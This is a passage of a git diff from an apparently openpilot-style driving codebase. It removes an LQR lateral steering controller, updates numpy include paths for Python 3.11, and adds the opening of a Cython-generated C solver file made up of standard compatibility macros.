CI): - super().__init__(CP, CI) - self.scale = CP.lateralTuning.lqr.scale - self.ki = CP.lateralTuning.lqr.ki - - self.A = np.array(CP.lateralTuning.lqr.a).reshape((2, 2)) - self.B = np.array(CP.lateralTuning.lqr.b).reshape((2, 1)) - self.C = np.array(CP.lateralTuning.lqr.c).reshape((1, 2)) - self.K = np.array(CP.lateralTuning.lqr.k).reshape((1, 2)) - self.L = np.array(CP.lateralTuning.lqr.l).reshape((2, 1)) - self.dc_gain = CP.lateralTuning.lqr.dcGain - - self.x_hat = np.array([[0], [0]]) - self.i_unwind_rate = 0.3 * DT_CTRL - self.i_rate = 1.0 * DT_CTRL - - self.reset() - - def reset(self): - super().reset() - self.i_lqr = 0.0 - - def update(self, active, CS, VM, params, last_actuators, steer_limited, desired_curvature, desired_curvature_rate, llk): - # def update(self, active, CS, CP, VM, params, last_actuators, desired_curvature, desired_curvature_rate): - lqr_log = log.ControlsState.LateralLQRState.new_message() - - torque_scale = (0.45 + CS.vEgo / 60.0)**2 # Scale actuator model with speed - - # Subtract offset. Zero angle should correspond to zero torque - steering_angle_no_offset = CS.steeringAngleDeg - params.angleOffsetAverageDeg - - desired_angle = math.degrees(VM.get_steer_from_curvature(-desired_curvature, CS.vEgo, params.roll)) - - instant_offset = params.angleOffsetDeg - params.angleOffsetAverageDeg - desired_angle += instant_offset # Only add offset that originates from vehicle model errors - lqr_log.steeringAngleDesiredDeg = desired_angle - - # Update Kalman filter - angle_steers_k = float(self.C.dot(self.x_hat)) - e = steering_angle_no_offset - angle_steers_k - self.x_hat = self.A.dot(self.x_hat) + self.B.dot(CS.steeringTorqueEps / torque_scale) + self.L.dot(e) - - if not active: - lqr_log.active = False - lqr_output = 0. - output_steer = 0. - self.reset() - else: - lqr_log.active = True - - # LQR - u_lqr = float(desired_angle / self.dc_gain - self.K.dot(self.x_hat)) - lqr_output = torque_scale * u_lqr / self.scale - - # Integrator - if CS.steeringPressed: - self.i_lqr -= self.i_unwind_rate * float(np.sign(self.i_lqr)) - else: - error = desired_angle - angle_steers_k - i = self.i_lqr + self.ki * self.i_rate * error - control = lqr_output + i - - if (error >= 0 and (control <= self.steer_max or i < 0.0)) or \ - (error <= 0 and (control >= -self.steer_max or i > 0.0)): - self.i_lqr = i - - output_steer = lqr_output + self.i_lqr - output_steer = clip(output_steer, -self.steer_max, self.steer_max) - - lqr_log.steeringAngleDeg = angle_steers_k - lqr_log.i = self.i_lqr - lqr_log.output = output_steer - lqr_log.lqrOutput = lqr_output - lqr_log.saturated = self._check_saturation(self.steer_max - abs(output_steer) < 1e-3, CS, steer_limited) - return output_steer, desired_angle, lqr_log diff --git a/selfdrive/controls/lib/lateral_mpc_lib/acados_ocp_lat.json b/selfdrive/controls/lib/lateral_mpc_lib/acados_ocp_lat.json index e5b076689..50634e948 100644 --- a/selfdrive/controls/lib/lateral_mpc_lib/acados_ocp_lat.json +++ b/selfdrive/controls/lib/lateral_mpc_lib/acados_ocp_lat.json @@ -336,7 +336,7 @@ "zu": [], "zu_e": [] }, - "cython_include_dirs": "/usr/local/pyenv/versions/3.8.10/lib/python3.8/site-packages/numpy/core/include", + "cython_include_dirs": "/usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/core/include", "dims": { "N": 32, "nbu": 0, diff --git a/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/Makefile b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/Makefile index d2b348b66..86b79d437 100644 --- a/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/Makefile +++ b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/Makefile @@ -152,7 +152,7 @@ ocp_cython_o: ocp_cython_c -I $(INCLUDE_PATH)/blasfeo/include/ \ -I $(INCLUDE_PATH)/hpipm/include/ \ -I $(INCLUDE_PATH) \ - -I /usr/local/pyenv/versions/3.8.10/lib/python3.8/site-packages/numpy/core/include \ + -I /usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/core/include \ acados_ocp_solver_pyx.c \ ocp_cython: ocp_cython_o diff --git a/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/acados_ocp_solver_pyx.c b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/acados_ocp_solver_pyx.c new file mode 100644 index 000000000..d3fc080e2 --- /dev/null +++ b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/acados_ocp_solver_pyx.c @@ -0,0 +1,40397 @@ +/* Generated by Cython 3.0.0 */ + +#ifndef PY_SSIZE_T_CLEAN +#define PY_SSIZE_T_CLEAN +#endif /* PY_SSIZE_T_CLEAN */ +#if defined(CYTHON_LIMITED_API) && 0 + #ifndef Py_LIMITED_API + #if CYTHON_LIMITED_API+0 > 0x03030000 + #define Py_LIMITED_API CYTHON_LIMITED_API + #else + #define Py_LIMITED_API 0x03030000 + #endif + #endif +#endif + +#include "Python.h" +#ifndef Py_PYTHON_H + #error Python headers needed to compile C extensions, please install development version of Python. +#elif PY_VERSION_HEX < 0x02070000 || (0x03000000 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x03030000) + #error Cython requires Python 2.7+ or Python 3.3+. +#else +#define CYTHON_ABI "3_0_0" +#define __PYX_ABI_MODULE_NAME "_cython_" CYTHON_ABI +#define __PYX_TYPE_MODULE_PREFIX __PYX_ABI_MODULE_NAME "." +#define CYTHON_HEX_VERSION 0x030000F0 +#define CYTHON_FUTURE_DIVISION 1 +#include +#ifndef offsetof + #define offsetof(type, member) ( (size_t) & ((type*)0) -> member ) +#endif +#if !defined(_WIN32) && !defined(WIN32) && !defined(MS_WINDOWS) + #ifndef __stdcall + #define __stdcall + #endif + #ifndef __cdecl + #define __cdecl + #endif + #ifndef __fastcall + #define __fastcall + #endif +#endif +#ifndef DL_IMPORT + #define DL_IMPORT(t) t +#endif +#ifndef DL_EXPORT + #define DL_EXPORT(t) t +#endif +#define __PYX_COMMA , +#ifndef HAVE_LONG_LONG + #define HAVE_LONG_LONG +#endif +#ifndef PY_LONG_LONG + #define PY_LONG_LONG LONG_LONG +#endif +#ifndef Py_HUGE_VAL + #define Py_HUGE_VAL HUGE_VAL +#endif +#if defined(GRAALVM_PYTHON) + /* For very preliminary testing purposes. Most variables are set the same as PyPy. + The existence of this section does not imply that anything works or is even tested */ + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 1 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #undef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 1 + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) + #endif + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 0 + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(PYPY_VERSION) + #define CYTHON_COMPILING_IN_PYPY 1 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #undef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 1 + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) + #endif + #if PY_VERSION_HEX < 0x03090000 + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE (PY_VERSION_HEX >= 0x030400a1 && PYPY_VERSION_NUM >= 0x07030C00) + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(CYTHON_LIMITED_API) + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 1 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_CLINE_IN_TRACEBACK + #define CYTHON_CLINE_IN_TRACEBACK 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 1 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #ifndef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #endif + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS 1 + #endif + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 1 + #ifndef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(PY_NOGIL) + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 1 + #ifndef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 1 + #endif + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #ifndef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #ifndef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 1 + #endif + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #ifndef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 1 + #endif + #ifndef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 1 + #endif + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #ifndef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 +#else + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 1 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #ifndef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 1 + #endif + #ifndef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #endif + #ifndef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 1 + #endif + #if PY_MAJOR_VERSION < 3 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #ifndef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 1 + #endif + #ifndef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 1 + #endif + #ifndef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 1 + #endif + #if PY_VERSION_HEX < 0x030300F0 || PY_VERSION_HEX >= 0x030B00A2 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #elif !defined(CYTHON_USE_UNICODE_WRITER) + #define CYTHON_USE_UNICODE_WRITER 1 + #endif + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #ifndef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 1 + #endif + #ifndef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 1 + #endif + #ifndef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 1 + #endif + #ifndef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL (PY_MAJOR_VERSION < 3 || PY_VERSION_HEX >= 0x03060000 && PY_VERSION_HEX < 0x030C00A6) + #endif + #ifndef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL (PY_VERSION_HEX >= 0x030700A1) + #endif + #ifndef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 1 + #endif + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS 1 + #endif + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #ifndef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #endif + #if PY_VERSION_HEX < 0x030400a1 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 0 + #elif !defined(CYTHON_USE_TP_FINALIZE) + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #if PY_VERSION_HEX < 0x030600B1 + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #elif !defined(CYTHON_USE_DICT_VERSIONS) + #define CYTHON_USE_DICT_VERSIONS (PY_VERSION_HEX < 0x030C00A5) + #endif + #if PY_VERSION_HEX < 0x030700A3 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #elif !defined(CYTHON_USE_EXC_INFO_STACK) + #define CYTHON_USE_EXC_INFO_STACK 1 + #endif + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 1 + #endif +#endif +#if !defined(CYTHON_FAST_PYCCALL) +#define CYTHON_FAST_PYCCALL (CYTHON_FAST_PYCALL && PY_VERSION_HEX >= 0x030600B1) +#endif +#if !defined(CYTHON_VECTORCALL) +#define CYTHON_VECTORCALL (CYTHON_FAST_PYCCALL && PY_VERSION_HEX >= 0x030800B1) +#endif +#define CYTHON_BACKPORT_VECTORCALL (CYTHON_METH_FASTCALL && PY_VERSION_HEX < 0x030800B1) +#if CYTHON_USE_PYLONG_INTERNALS + #if PY_MAJOR_VERSION < 3 + #include "longintrepr.h" + #endif + #undef SHIFT + #undef BASE + #undef MASK + #ifdef SIZEOF_VOID_P + enum { __pyx_check_sizeof_voidp = 1 / (int)(SIZEOF_VOID_P == sizeof(void*)) }; + #endif +#endif +#ifndef __has_attribute + #define __has_attribute(x) 0 +#endif +#ifndef __has_cpp_attribute + #define __has_cpp_attribute(x) 0 +#endif +#ifndef CYTHON_RESTRICT + #if defined(__GNUC__) + #define CYTHON_RESTRICT __restrict__ + #elif defined(_MSC_VER) && _MSC_VER >= 1400 + #define CYTHON_RESTRICT __restrict + #elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define CYTHON_RESTRICT restrict + #else + #define CYTHON_RESTRICT + #endif +#endif +#ifndef CYTHON_UNUSED + #if defined(__cplusplus) + /* for clang __has_cpp_attribute(maybe_unused) is true even before C++17 + * but leads to warnings with -pedantic, since it is a C++17 feature */ + #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) + #if __has_cpp_attribute(maybe_unused) + #define CYTHON_UNUSED [[maybe_unused]] + #endif + #endif + #endif +#endif +#ifndef CYTHON_UNUSED +# if defined(__GNUC__) +# if !(defined(__cplusplus)) || (__GNUC__ > 3 || (__GNUC__ == 3 && __GNUC_MINOR__ >= 4)) +# define CYTHON_UNUSED __attribute__ ((__unused__)) +# else +# define CYTHON_UNUSED +# endif +# elif defined(__ICC) || (defined(__INTEL_COMPILER) && !defined(_MSC_VER)) +# define CYTHON_UNUSED __attribute__ ((__unused__)) +# else +# define CYTHON_UNUSED +# endif +#endif +#ifndef CYTHON_UNUSED_VAR +# if defined(__cplusplus) + template void CYTHON_UNUSED_VAR( const T& ) { } +# else +# define CYTHON_UNUSED_VAR(x) (void)(x) +# endif +#endif +#ifndef CYTHON_MAYBE_UNUSED_VAR + #define CYTHON_MAYBE_UNUSED_VAR(x) CYTHON_UNUSED_VAR(x) +#endif +#ifndef CYTHON_NCP_UNUSED +# if CYTHON_COMPILING_IN_CPYTHON +# define CYTHON_NCP_UNUSED +# else +# define CYTHON_NCP_UNUSED CYTHON_UNUSED +# endif +#endif +#define __Pyx_void_to_None(void_result) ((void)(void_result), Py_INCREF(Py_None), Py_None) +#ifdef _MSC_VER + #ifndef _MSC_STDINT_H_ + #if _MSC_VER < 1300 + typedef unsigned char uint8_t; + typedef unsigned short uint16_t; + typedef unsigned int uint32_t; + #else + typedef unsigned __int8 uint8_t; + typedef unsigned __int16 uint16_t; + typedef unsigned __int32 uint32_t; + #endif + #endif + #if _MSC_VER < 1300 + #ifdef _WIN64 + typedef unsigned long long __pyx_uintptr_t; + #else + typedef unsigned int __pyx_uintptr_t; + #endif + #else + #ifdef _WIN64 + typedef unsigned __int64 __pyx_uintptr_t; + #else + typedef unsigned __int32 __pyx_uintptr_t; + #endif + #endif +#else + #include + typedef uintptr_t __pyx_uintptr_t; +#endif +#ifndef CYTHON_FALLTHROUGH + #if defined(__cplusplus) + /* for clang __has_cpp_attribute(fallthrough) is true even before C++17 + * but leads to warnings with -pedantic, since it is a C++17 feature */ + #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) + #if __has_cpp_attribute(fallthrough) + #define CYTHON_FALLTHROUGH [[fallthrough]] + #endif + #endif + #ifndef CYTHON_FALLTHROUGH + #if __has_cpp_attribute(clang::fallthrough) + #define CYTHON_FALLTHROUGH [[clang::fallthrough]] + #elif __has_cpp_attribute(gnu::fallthrough) + #define CYTHON_FALLTHROUGH [[gnu::fallthrough]] + #endif + #endif + #endif + #ifndef CYTHON_FALLTHROUGH + #if __has_attribute(fallthrough) + #define CYTHON_FALLTHROUGH __attribute__((fallthrough)) + #else + #define CYTHON_FALLTHROUGH + #endif + #endif + #if defined(__clang__) && defined(__apple_build_version__) + #if __apple_build_version__ < 7000000 + #undef CYTHON_FALLTHROUGH + #define CYTHON_FALLTHROUGH + #endif + #endif +#endif +#ifdef __cplusplus + template + struct __PYX_IS_UNSIGNED_IMPL {static const bool value = T(0) < T(-1);}; + #define __PYX_IS_UNSIGNED(type) (__PYX_IS_UNSIGNED_IMPL::value) +#else + #define __PYX_IS_UNSIGNED(type) (((type)-1) > 0) +#endif +#if CYTHON_COMPILING_IN_PYPY == 1 + #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x030A0000) +#else + #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x03090000) +#endif +#define __PYX_REINTERPRET_FUNCION(func_pointer, other_pointer) ((func_pointer)(void(*)(void))(other_pointer)) + +#ifndef CYTHON_INLINE + #if defined(__clang__) + #define CYTHON_INLINE __inline__ __attribute__ ((__unused__)) + #elif defined(__GNUC__) + #define CYTHON_INLINE __inline__ + #elif defined(_MSC_VER) + #define CYTHON_INLINE __inline + #elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define CYTHON_INLINE inline + #else + #define CYTHON_INLINE + #endif +#endif + +#define __PYX_BUILD_PY_SSIZE_T "n" +#define CYTHON_FORMAT_SSIZE_T "z" +#if PY_MAJOR_VERSION < 3 + #define __Pyx_BUILTIN_MODULE_NAME "__builtin__" + #define __Pyx_DefaultClassType PyClass_Type + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_New(a+k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#else + #define __Pyx_BUILTIN_MODULE_NAME "builtins" + #define __Pyx_DefaultClassType PyType_Type +#if PY_VERSION_HEX >= 0x030B00A1 + static CYTHON_INLINE PyCodeObject* __Pyx_PyCode_New(int a, int p, int k, int l, int s, int f, + PyObject *code, PyObject *c, PyObject* n, PyObject *v, + PyObject *fv, PyObject *cell, PyObject* fn, + PyObject *name, int fline, PyObject *lnos) { + PyObject *kwds=NULL, *argcount=NULL, *posonlyargcount=NULL, *kwonlyargcount=NULL; + PyObject *nlocals=NULL, *stacksize=NULL, *flags=NULL, *replace=NULL, *empty=NULL; + const char *fn_cstr=NULL; + const char *name_cstr=NULL; + PyCodeObject *co=NULL, *result=NULL; + PyObject *type, *value, *traceback; + PyErr_Fetch(&type, &value, &traceback); + if (!(kwds=PyDict_New())) goto end; + if (!(argcount=PyLong_FromLong(a))) goto end; + if (PyDict_SetItemString(kwds, "co_argcount", argcount) != 0) goto end; + if (!(posonlyargcount=PyLong_FromLong(p))) goto end; + if (PyDict_SetItemString(kwds, "co_posonlyargcount", posonlyargcount) != 0) goto end; + if (!(kwonlyargcount=PyLong_FromLong(k))) goto end; + if (PyDict_SetItemString(kwds, "co_kwonlyargcount", kwonlyargcount) != 0) goto end; + if (!(nlocals=PyLong_FromLong(l))) goto end; + if (PyDict_SetItemString(kwds, "co_nlocals", nlocals) != 0) goto end; + if (!(stacksize=PyLong_FromLong(s))) goto end; + if (PyDict_SetItemString(kwds, "co_stacksize", stacksize) != 0) goto end; + if (!(flags=PyLong_FromLong(f))) goto end; + if (PyDict_SetItemString(kwds, "co_flags", flags) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_code", code) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_consts", c) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_names", n) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_varnames", v) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_freevars", fv) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_cellvars", cell) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_linetable", lnos) != 0) goto end; + if (!(fn_cstr=PyUnicode_AsUTF8AndSize(fn, NULL))) goto end; + if (!(name_cstr=PyUnicode_AsUTF8AndSize(name, NULL))) goto end; + if (!(co = PyCode_NewEmpty(fn_cstr, name_cstr, fline))) goto end; + if (!(replace = PyObject_GetAttrString((PyObject*)co, "replace"))) goto end; + if (!(empty = PyTuple_New(0))) goto end; + result = (PyCodeObject*) PyObject_Call(replace, empty, kwds); + end: + Py_XDECREF((PyObject*) co); + Py_XDECREF(kwds); + Py_XDECREF(argcount); + Py_XDECREF(posonlyargcount); + Py_XDECREF(kwonlyargcount); + Py_XDECREF(nlocals); + Py_XDECREF(stacksize); + Py_XDECREF(replace); + Py_XDECREF(empty); + if (type) { + PyErr_Restore(type, value, traceback); + } + return result; + } +#elif PY_VERSION_HEX >= 0x030800B2 && !CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_NewWithPosOnlyArgs(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#else + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_New(a, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#endif +#endif +#if PY_VERSION_HEX >= 0x030900A4 || defined(Py_IS_TYPE) + #define __Pyx_IS_TYPE(ob, type) Py_IS_TYPE(ob, type) 